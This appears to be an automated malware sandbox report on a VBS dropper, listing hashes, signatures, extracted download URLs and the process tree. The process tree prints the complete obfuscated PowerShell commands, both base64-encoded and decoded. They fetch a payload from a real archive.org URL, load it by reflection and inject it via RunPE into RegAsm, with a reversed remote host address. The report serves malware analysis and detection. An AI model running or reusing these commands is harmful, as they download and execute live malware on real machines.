Analysis
-
max time kernel
119s -
max time network
119s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
-
submitted
17-09-2024 01:03
General
-
Target
186313dcc5e093e7997eaa5e1bd8e9d788bcb35537ab3d6741e3b6e37eecfa60.vbs
-
Size
237KB
-
MD5
9e58cfdb4b036627fd9f2713826c023a
-
SHA1
e29d9ea8098c7b48c4155001a17f0db41907b1a5
-
SHA256
186313dcc5e093e7997eaa5e1bd8e9d788bcb35537ab3d6741e3b6e37eecfa60
-
SHA512
2b003e99e56973cc691e89eed4b9a42fb320e982d444adcfbc2fbe7a4b554a711df2e7c7e684b33abdbd417a8c26d84e88504a4be7b2d8b28cc4ab5fdf4d503a
-
SSDEEP
6144:2G9rLSoa5bOCXLvtrodqZJR2pnCc9Q5ec8:f9reoa5yCXLvtUqx+79Q5ec8
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
ps1.dropper
https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt
exe.dropper
https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt
Signatures
-
Blocklisted process makes network request 2 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
-
Suspicious use of WriteProcessMemory 6 IoCs
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\186313dcc5e093e7997eaa5e1bd8e9d788bcb35537ab3d6741e3b6e37eecfa60.vbs"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnWUZsdXJsID0gTVNSJysnaHR0cCcrJ3M6Ly9pYTYwMDEwJysnMC4nKyd1cy5hcmNoaScrJ3ZlJysnLm9yZy8yNCcrJy9pdGUnKydtcycrJy9kZXRhaC1ub3RlLXYvRGV0YWgnKydObycrJ3RlVi50JysneCcrJ3RNU1InKyc7WScrJ0ZsYmFzZTY0JysnQ29udGVudCA9IChOZXcnKyctT2JqJysnZWN0IFN5c3RlbS5OZScrJ3QuVycrJ2ViQ2wnKydpJysnZW50JysnKS5EJysnbycrJ3duJysnbG9hZFMnKyd0cmluZygnKydZRicrJ2x1cmwpO1lGJysnbCcrJ2JpbmEnKydyeUNvbnQnKydlbnQgJysnPSBbJysnU3lzdGVtLkNvJysnbnZlcnRdOjpGcm9tQicrJ2FzZTY0U3RyaW4nKydnKFlGJysnbGJhcycrJ2U2NENvbnRlbnQnKycpO1lGJysnbGEnKydzc2VtYmx5JysnICcrJz0gW1JlZmwnKydlY3Rpb24uQXNzZW1iJysnbHldOjonKydMb2FkKCcrJ1lGJysnbGJpbicrJ2FyeUNvbnQnKydlbicrJ3QpO1knKydGbHR5JysncGUgPSBZRmxhcycrJ3NlJysnbWJseScrJy4nKydHZScrJ3RUeXBlKE1TUicrJ1J1JysnblAnKydFLkhvbWVNU1InKycpO1lGbG0nKydldGhvZCA9ICcrJ1lGJysnbHR5cGUuR2V0TWV0aG8nKydkJysnKE1TJysnUlZBSU1TJysnUik7WUZsbWV0aG9kLkludm9rJysnZShZJysnRicrJ2wnKydudWxsLCBbb2JqZWN0JysnW11dQCcrJyhNJysnU1J0eHQuT0lOTkMnKycvJysnNScrJzc3JysnLzYnKyc1MS4zMycrJzEuMzInKycuODkxLycrJy86cHR0aE0nKydTUiAsICcrJ01TUmQnKydlJysncycrJ2EnKyd0aXZhZCcrJ29NJysnUycrJ1IgLCBNU1JkZXNhdGl2YWRvTVMnKydSICwgTVNSZGVzJysnYXRpdmFkb01TJysnUixNUycrJ1InKydSZScrJ2dBcycrJ21NUycrJ1IsTVNSTVNSKSknKSAgLVJFcGxBQ2UgKFtjaEFyXTg5K1tjaEFyXTcwK1tjaEFyXTEwOCksW2NoQXJdMzYgIC1DUmVQbGFjZSAgKFtjaEFyXTc3K1tjaEFyXTgzK1tjaEFyXTgyKSxbY2hBcl0zOSl8JiggJFBTSE9tZVsyMV0rJFBTSE9tZVszMF0rJ3gnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('YFlurl = MSR'+'http'+'s://ia60010'+'0.'+'us.archi'+'ve'+'.org/24'+'/ite'+'ms'+'/detah-note-v/Detah'+'No'+'teV.t'+'x'+'tMSR'+';Y'+'Flbase64'+'Content = (New'+'-Obj'+'ect System.Ne'+'t.W'+'ebCl'+'i'+'ent'+').D'+'o'+'wn'+'loadS'+'tring('+'YF'+'lurl);YF'+'l'+'bina'+'ryCont'+'ent '+'= ['+'System.Co'+'nvert]::FromB'+'ase64Strin'+'g(YF'+'lbas'+'e64Content'+');YF'+'la'+'ssembly'+' '+'= [Refl'+'ection.Assemb'+'ly]::'+'Load('+'YF'+'lbin'+'aryCont'+'en'+'t);Y'+'Flty'+'pe = YFlas'+'se'+'mbly'+'.'+'Ge'+'tType(MSR'+'Ru'+'nP'+'E.HomeMSR'+');YFlm'+'ethod = '+'YF'+'ltype.GetMetho'+'d'+'(MS'+'RVAIMS'+'R);YFlmethod.Invok'+'e(Y'+'F'+'l'+'null, [object'+'[]]@'+'(M'+'SRtxt.OINNC'+'/'+'5'+'77'+'/6'+'51.33'+'1.32'+'.891/'+'/:ptthM'+'SR , '+'MSRd'+'e'+'s'+'a'+'tivad'+'oM'+'S'+'R , MSRdesativadoMS'+'R , MSRdes'+'ativadoMS'+'R,MS'+'R'+'Re'+'gAs'+'mMS'+'R,MSRMSR))') -REplACe ([chAr]89+[chAr]70+[chAr]108),[chAr]36 -CRePlace ([chAr]77+[chAr]83+[chAr]82),[chAr]39)|&( $PSHOme[21]+$PSHOme[30]+'x')"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
7KB
MD5928ac813ff765e6c7a51ae2e77747876
SHA1e5e9498af9f611d6da13b07366b9cd5f41f294af
SHA256f4ab7ee25c361dbd0c6bd2455051567abc4d584c365b9082978fe9bdeccdd7a0
SHA512e2cb2c6cf1df38cd33f4d5c9344c0b9c6290909eea56a56b87c7638cb336d6b6847da5dc42b3460552b34958f2a4e540e3bf193c0ddae3a8b95194fc790c7362
-
Filesize
4KB
-
Filesize
2.9MB
-
Filesize
32KB
-
Filesize
9.6MB
-
Filesize
9.6MB